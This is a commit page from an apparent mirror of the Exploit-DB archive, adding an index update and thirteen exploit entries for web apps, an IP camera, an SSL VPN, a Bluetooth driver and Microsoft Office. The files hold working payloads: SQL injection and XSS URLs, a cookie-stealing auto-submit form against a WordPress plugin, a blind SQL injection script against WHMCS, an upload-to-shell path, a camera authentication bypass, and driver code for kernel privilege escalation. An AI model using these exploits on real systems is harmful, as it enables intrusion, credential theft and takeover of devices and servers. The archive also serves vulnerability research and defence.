bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-08-26

Browse source 
13 new exploits
This commit is contained in:
Offensive Security 2015-08-26 05:01:43 +00:00
parent 4497b423f7
commit 7c8aad6618
14 changed files with 375 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
files.csv
View file

@ -34271,3 +34271,16 @@ id,file,description,date,author,platform,type,port
37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload Vulnerbility",2015-08-24,Mdn_Newbie,php,webapps,80
37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,"_ Un_N0n _",windows,dos,0
37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,metasploit,multiple,remote,0
37959,platforms/php/webapps/37959.txt,"BSW Gallery 'uploadpic.php' Arbitrary File Upload Vulnerability",2012-10-18,"cr4wl3r ",php,webapps,0
37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery force-download.php file Parameter Information Disclosure",2012-10-18,"cr4wl3r ",php,webapps,0
37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery plist.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0
37962,platforms/php/webapps/37962.txt,"Amateur Photographer's Image Gallery plist.php albumid Parameter XSS",2012-10-18,"cr4wl3r ",php,webapps,0
37963,platforms/php/webapps/37963.txt,"Amateur Photographer's Image Gallery fullscreen.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0
37964,platforms/windows/local/37964.c,"Broadcom WIDCOMM Bluetooth 'btkrnl.sys' Driver Local Privilege Escalation Vulnerability",2012-10-18,"Nikita Tarakanov",windows,local,0
37965,platforms/hardware/webapps/37965.txt,"Keeper IP Camera 3.2.2.10 - Authentication Bypass",2015-08-25,"RAT - ThiefKing",hardware,webapps,0
37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0
37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0
37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 'index.php' Script Cross Site Scripting Vulnerability",2012-10-19,Netsparker,php,webapps,0
37969,platforms/hardware/remote/37969.txt,"FirePass <= 7.0 SSL VPN 'refreshURL' Parameter URI Redirection Vulnerability",2012-10-21,"Aung Khant",hardware,remote,0
37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin Cross Site Scripting Vulnerability",2012-10-18,MustLive,php,webapps,0
37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 'googlecheckout.php' SQL Injection Vulnerability",2012-10-22,"Starware Security Team",php,webapps,0

Can't render this file because it is too large.

9
platforms/hardware/remote/37969.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56156/info
FirePass SSL VPN is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing attacks; other attacks are possible.
Versions prior to FirePass 7.0.0 HF-70-7 and 6.1.0 HF-610-9 are vulnerable.
http://www.example.com/my.activation.cns.php3?langchar=&ui_translation=&refreshURL==http://attacker

21
platforms/hardware/webapps/37965.txt Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title: Keeper IP Camera - Authentication Bypass
# Date: 25/08/2015
# Exploit Author: RAT - ThiefKing
# Vendor Homepage: http://www.keeper.cn/en/Camera-ip.asp
# Version: 3.2.2.10
# WEB Version: 6.1.17.192
# Tested on: QB200W, QB130W, QA130W,...
Exploit:
1 - First, open your browser
2 - Enter the IP address or domain to see the login screen of the camera
3 - Now go to page umanage.asp (http://ipaddress:port/umanage.asp)
You can change or view passwords
TEST: http://server:88/login.asp
--
RAT - ThiefKing
http://tromcap.com

56
platforms/php/webapps/37959.txt Executable file
View file

@ -0,0 +1,56 @@
source: http://www.securityfocus.com/bid/56109/info
BSW Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Code in uploadpic.php
print "<form method=\"POST\" action=\"dopic.php\"enctype=\"multipart/form-data\" style=\"width: 227px\">";
print "<table align=\"center\" style=\"width: 600px\"dir=\"ltr\"><tr><th align=\"right\"width=\"120\" class=\"topic\"><b>File Upload:</b></th>";
print "<th align=\"left\"><input type=\"file\" name=\"fileupload\"></th></tr>";
print "<tr><th><input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"10240000\"></th></tr></table>";
print"<table align=\"center\"width=\"600\"dir=\"ltr\">";
print"<th class=\"topic\"width=\"120\"align=\"right\">Image Title</th><th align=\"left\"><input style=\"width:400\"type=\"text\" name=\"picture\" /></th></table>";
print"<table align=\"center\"dir=\"ltr\" width=\"600\"><th class=\"topic\" width=\"120\"align=\"right\">Image Description</th>";
print"<th align=\"left\"><textarea name=\"descrip\"cols=\"48\"rows=\"5\">&lt;/textarea&gt;</th></table>";
Code in dopic.php
$fname=$_POST['picture'];
$descrip=$_POST['descrip'];
$file_dir ="gallery/";
foreach($_FILES as $file_name => $file_array) {
echo "path: ".$file_array["tmp_name"]."<br/>\n";
echo "name: ".$file_array["name"]."<br/>\n";
echo "type: ".$file_array["type"]."<br/>\n";
echo "size: ".$file_array["size"]."<br/>\n";
if (is_uploaded_file($file_array["tmp_name"])) {
move_uploaded_file($file_array["tmp_name"], "$file_dir/".$file_array["name"]) or die ("Couldn't copy");
echo "Done!<br/>";
}
}
$image=$file_dir.$file_array["name"];
$ip = getenv("REMOTE_ADDR");
$sql = "insert into gallery (picture,files,descrip,updated)values('$fname','$image','$descrip',now());";
mysql_query($sql,$mysql);
mysql_close($mysql);
------------------------------------------------------------------------------------
Proof of Concept :
http://www.example.com/path_gallery/uploadpic.php
Shell :
http://www.example.com/path_gallery/gallery/shell.php
See for the demo :
http://www.example.com/demo/demo1.png
http://www.example.com/demo/demo2.png
http://www.example.com/demo/demo3.png

9
platforms/php/webapps/37960.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56110/info
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
http://www.example.com/path_gallery/force-download.php?file=[RFD]

9
platforms/php/webapps/37961.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56110/info
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
http://www.example.com/path_gallery/plist.php?albumid=[SQLi]

9
platforms/php/webapps/37962.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56110/info
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
http://www.example.com/path_gallery/plist.php?albumid=[XSS]

9
platforms/php/webapps/37963.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56110/info
Amateur Photographer's Image Gallery is prone to multiple SQL injection vulnerabilities, a cross-site scripting vulnerability, and an arbitrary file-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and obtain sensitive information from local files on computers running the vulnerable application.
Amateur Photographer's Image Gallery 0.9a is vulnerable; other versions may also be affected.
http://www.example.com/path_gallery/fullscreen.php?albumid=[SQLi]

9
platforms/php/webapps/37968.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/56148/info
CMS Mini is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CMS Mini 0.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/view/index.php?path='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000A3)%3C/script%3E&p=cms.guestbook&msg=Message%20sent

20
platforms/php/webapps/37970.html Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/56159/info
The Wordfence Security plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Wordfence Security 3.3.5 is vulnerable; other versions may also be affected.
<html>
<head>
<title>Wordfence Security XSS exploit (C) 2012 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
<input type="hidden" name="email"
value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>

37
platforms/php/webapps/37971.html Executable file
View file

@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/56173/info
WHMCS (WHM Complete Solution) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WHMCS 4.5.2 is vulnerable; other versions may also be affected.
#Proof of Concept :
<html>
<head>
<title>WHMCS Blind SQL Injection POC</title>
</head>
<body>
<script>
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
var http = new XMLHttpRequest();
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
} catch (e) {
alert("Permission UniversalBrowserRead denied.");
}
http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
http.onreadystatechange = handleResponse;
http.send(params);
function handleResponse() {
if(http.readyState == 4 && http.status == 200){
var response = http.responseText;
alert(response);
}
}
</script>
</body>
</html>

68
platforms/windows/dos/37966.txt Executable file
View file

@ -0,0 +1,68 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=171&can=1
The following access violation was observed in Microsoft Office 2007
(Word document):
(8c0.e68): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012dcf8 ebx=40000000 ecx=40000000 edx=0012de1c esi=40000000 edi=011f1400
eip=32881800 esp=0012d010 ebp=0012d038 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mso!Ordinal7799+0x2fc:
32881800 0fb74614 movzx eax,word ptr [esi+0x14] ds:0023:40000014=????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0012d038 328a0a4e mso!Ordinal7799+0x2fc
0012ddd8 328a0a2c mso!Ordinal4388+0x1bc
0012dde4 320c337c mso!Ordinal4388+0x19a
0012de2c 320c330f wwlib!DllGetClassObject+0x850ba
0012de74 312db32b wwlib!DllGetClassObject+0x8504d
0012df1c 312dadf8 wwlib!FMain+0x96d7c
0012df84 312da84c wwlib!FMain+0x96849
0012e074 6be51b27 wwlib!FMain+0x9629d
0012e114 6be5c65b MSPTLS!FsDestroyMemory+0x1ee4e
0012e28c 6be5c94c MSPTLS!FsDestroyMemory+0x29982
0012e2d8 6be36d59 MSPTLS!FsDestroyMemory+0x29c73
0012e344 6be37f87 MSPTLS!FsDestroyMemory+0x4080
0012e450 6be4e8eb MSPTLS!FsDestroyMemory+0x52ae
0012e4e0 6be4f1ff MSPTLS!FsDestroyMemory+0x1bc12
0012e584 6be4f362 MSPTLS!FsDestroyMemory+0x1c526
0012e624 6be4f5cc MSPTLS!FsDestroyMemory+0x1c689
0012e7d8 6be35d9f MSPTLS!FsDestroyMemory+0x1c8f3
0012e8ec 6be630b5 MSPTLS!FsDestroyMemory+0x30c6
0012e970 6be40ee2 MSPTLS!FsDestroyMemory+0x303dc
0012e9e4 6be63a7a MSPTLS!FsDestroyMemory+0xe209
Notes:
- Reproduce on Windows Server 2003 and Windows 7.
- The crash occurs due to an invalid read dereference of a bad object
pointer. If the word value read is controlled and set to a value other
than 0xFFFF, then a controlled value is used as an indirect call
target (at 328A1DD4 in MSO.dll 12.0.6683.5000).
- The bad object pointer is passed in to MSO.dll from wwlib.dll
(second argument of function at 328A0A16 in MSO.dll 12.0.6683.5000).
- The test-case reduces to a 50-bit difference from the original
sample document.
- The affected bits lie in the OneTableDocumentStream's data section,
as well as as PlcfSed's aCP[0] field and PNFKPPAPX[44]'s pn field.
- The copy operation at 3126A36C (wwlib.dll 12.0.6707.5000) uses a
source buffer from the OneTableDocumentStream's data section, and
copies this invalid data into a stack buffer. The bad object pointer
comes from this stack-based structure.
- Attached files: 037542f7_crash.rtf (crashing file),
037542f7_orig.doc (original file). A test case with full control of
the crashing register value (0xAAAAAAAA) is also attached
(037542f7_full.doc)
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37966.zip

65
platforms/windows/dos/37967.txt Executable file
View file

@ -0,0 +1,65 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=170&can=1
The following access violation was observed in Microsoft Office 2007
(Word document):
(e24.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0583a748 ebx=00eb4684 ecx=003ad1a3 edx=00000000 esi=049860bc edi=00122238
eip=7814500a esp=001221e0 ebp=001221e8 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
MSVCR80!memcpy+0x5a:
7814500a f3a5 rep movsd ds:049860bc=???????? es:00122238=3348bcd8
0:000> k
ChildEBP RetAddr
001221e8 31249c0e MSVCR80!memcpy+0x5a
00122204 3126a371 wwlib!FMain+0x565f
00122220 3203de3c wwlib!FMain+0x25dc2
00122268 320dab4c wwlib!DllCanUnloadNow+0x56a6bb
00122280 31fc363f wwlib!DllGetClassObject+0x9c88a
0012229c 31f9acde wwlib!DllCanUnloadNow+0x4efebe
001222b4 31f9b0e5 wwlib!DllCanUnloadNow+0x4c755d
00122308 31bd68c2 wwlib!DllCanUnloadNow+0x4c7964
001223bc 3201a69b wwlib!DllCanUnloadNow+0x103141
00122a68 3129f4eb wwlib!DllCanUnloadNow+0x546f1a
00123b68 3129e8e5 wwlib!FMain+0x5af3c
00123bac 32073906 wwlib!FMain+0x5a336
00126d28 32073627 wwlib!DllGetClassObject+0x35644
0012b14c 32073294 wwlib!DllGetClassObject+0x35365
0012b19c 3209ac20 wwlib!DllGetClassObject+0x34fd2
0012e2f8 3208c781 wwlib!DllGetClassObject+0x5c95e
0012e31c 31314684 wwlib!DllGetClassObject+0x4e4bf
0012f580 320e04b7 wwlib!FMain+0xd00d5
0012f630 320e037f wwlib!DllGetClassObject+0xa21f5
0012f648 32812493 wwlib!DllGetClassObject+0xa20bd
Notes:
- Reproduces on Windows Server 2003 and Windows 7
- The crash occurs due to a memcpy with an invalid source buffer.
- The invalid source buffer is actually indicative of an invalid size
being used in a pointer calculation at 3126A360 (wwlib.dll
12.0.6707.5000). This invalid size can also be seen in ecx at the time
of access violation.
- The large size parameter can result in a stack-based buffer overflow.
- Alternatively, if the copy operation succeeds (by using a size value
large enough to result in an out-of-bounds source buffer, but not so
large to cause an access violation during copy), then it is also
possible to get an arbitrary free from later usage of controlled
pointers in the destination buffer.
- The crashing test case was created using a chunk reordering
strategy, and does not cleanly minimize (106 bit change from original
file).
- Attached files: 86ea4a3c_crash.rtf (crashing file),
86ea4a3c_orig.doc (original file)
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37967.zip

41
platforms/windows/local/37964.c Executable file
View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/56124/info
Broadcom WIDCOMM Bluetooth is prone to a local privilege-escalation vulnerability.
A local attacker may exploit this issue to gain escalated privileges and execute arbitrary code with kernel privileges. Failed exploit attempts may result in a denial-of-service condition.
Broadcom WIDCOMM Bluetooth 5.6.0.6950 is vulnerable; other versions may also be affected.
HANDLE hDevice;
char *inbuff, *outbuff;
DWORD ioctl, len,;
if ( (hDevice = CreateFileA("\\\\.\\btkrnl",
0,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!\n");
}
else
{
printf("Error: Error opening device \n");
return 0;
}
inbuff = (char*)malloc(0x12000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}
outbuff = (char*)malloc(0x12000);
if(!outbuff){
printf("malloc failed!\n");
return 0;
}
ioctl = 0x2A04C0;
memset(inbuff, 0x41, 0x70);
DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x70, (LPVOID)outbuff, 0x70, &len, NULL);